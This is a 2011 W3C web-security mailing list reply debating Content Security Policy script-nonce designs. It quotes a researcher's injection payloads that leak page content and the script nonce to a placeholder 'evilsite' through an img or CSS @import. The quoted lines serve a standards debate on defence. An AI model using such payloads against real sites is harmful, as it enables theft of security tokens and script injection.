Re: [Content Security Policy] Proposal to move the debate forward from Brandon Sterne on 2011-01-28 (public-web-security@w3.org from January 2011)

From: Brandon Sterne <bsterne@mozilla.com>
Date: Fri, 28 Jan 2011 10:42:49 -0800
To: gaz Heyes <gazheyes@gmail.com>
CC: Gervase Markham <gerv@mozilla.org>, public-web-security@w3.org
Message-ID: <4D430E29.8040309@mozilla.com>

On 1/28/11 3:32 AM, gaz Heyes wrote:
> Ah wait hehe I already know how to send that data remotely:-
> 
>  INJECTION HERE
> <script> /* '" SCRIPT_KEY_HERE */ var valid_script = 0; ... </script>
> 
> Injection:-
> <style>@import//evilsite?
> 
> So yeah well and truly pwnd, can we have start and end markers now? :D

Attributes inside the end-tag of any element seems to break latest
standards for XML [1] and HTML [2].

I'm also still trying to wrap my head around your <iframe> and <img>
token-stealing attack on the script-nonce approach.

On 1/28/11 2:54 AM, gaz Heyes wrote:
> You want a automatic attack? Ok. I'm really clueless as to why you don't get this. I said there are many ways.
> <iframe src="//cspsite?injection=<img src='//evilsite?token please=" onload="setTimeout(function(){ readKey();doJSInjection(); }, 10000)"></iframe>

On 1/28/11 3:07 AM, gaz Heyes wrote:
> Hehe I thought you were being awkward, ok the iframe isn't injected it serves to read the data that is injected. So the img injection sends the data from the page to the next single quote (including the script key) to our evil server, the evil server then reads the script key and sends it back to the iframe, the iframe then injects javascript and a valid key. The iframe is outside of the target site itself.

I definitely see how the injected <img> steals everything until the next
single quote including, potentially, the script nonce.  But your onload
handler is on the <iframe>, which you said isn't injected.  I don't see
how the doJSInjection() step works.  Either a) the <iframe> isn't
injected into the target site and thus wouldn't have script access to
//cspsite, or b) the <iframe> is injected into the target domain where,
presumably, CSP is preventing the onload handler from running.  It
sounds like you are explicitly saying it is a), so I am confused as to
how the iframe "injects javascript and a valid key".

I still think globally disallowing inline scripts and then letting a
site individually whitelist script blocks with a nonce attribute is a
good way to go.  I haven't yet seen good evidence as to why this
approach shouldn't be pursued.

Cheers,
Brandon

[1] http://www.w3.org/TR/REC-xml/#dt-etag
[2]
http://www.whatwg.org/specs/web-apps/current-work/multipage/syntax.html#syntax-end-tag

Received on Friday, 28 January 2011 18:43:23 UTC